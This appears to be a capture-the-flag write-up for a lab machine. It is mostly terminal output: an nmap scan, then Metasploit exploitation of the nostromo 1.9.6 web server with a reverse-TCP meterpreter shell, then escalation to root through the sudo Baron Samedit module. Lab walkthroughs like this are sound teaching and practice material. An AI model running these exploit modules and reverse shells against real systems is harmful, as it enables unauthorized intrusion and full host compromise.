Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-22 20:47 MST
Nmap scan report for 10.129.28.145
Host is up (0.061s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa99a81668cd41ccf96c8401c759095c (RSA)
| 256 93dd1a23eed71f086b58470973a388cc (ECDSA)
|_ 256 9dd6621e7afb8f5692e637f110db9bce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.76 seconds
Search to see if nostromo 1.9.6 has any exploits
❯ searchsploit nostromo
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit) | multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution | multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | linux/remote/35466.sh
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Load found exploit up in metasploit
msf6 exploit(multi/http/nostromo_code_exec) > set payload payload/cmd/unix/python/meterpreter/reverse_tcp │ valid_lft forever preferred_lft forever
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/nostromo_code_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.19:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/python/meterpreter/reverse_tcp command payload
[*] Sending stage (24380 bytes) to 10.129.28.145
[*] Meterpreter session 2 opened (10.10.16.19:4444 -> 10.129.28.145:40198) at 2022-12-22 20:52:07 -0700
meterpreter > getuid
Server username: www-data
meterpreter > background
[*] Backgrounding session 2...
Grab multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > exploit
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.
2 exploit/linux/local/su_login Yes The target appears to be vulnerable.
3 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.
4 exploit/linux/local/ubuntu_enlightenment_mount_priv_esc Yes The target appears to be vulnerable.
sudo 1.8.27 looks like a good target.
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: python
[*] Started reverse TCP handler on 10.10.16.19:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.
[*] Writing '/tmp/KpNJLxj9J.py' (763 bytes) ...
[*] Writing '/tmp/libnss_UTY8j/N .so.2' (548 bytes) ...
[*] Sending stage (3045348 bytes) to 10.129.28.145
[+] Deleted /tmp/KpNJLxj9J.py
[+] Deleted /tmp/libnss_UTY8j/N .so.2
[+] Deleted /tmp/libnss_UTY8j
[*] Meterpreter session 3 opened (10.10.16.19:4443 -> 10.129.28.145:47712) at 2022-12-22 21:06:24 -0700
meterpreter > getuid
Server username: root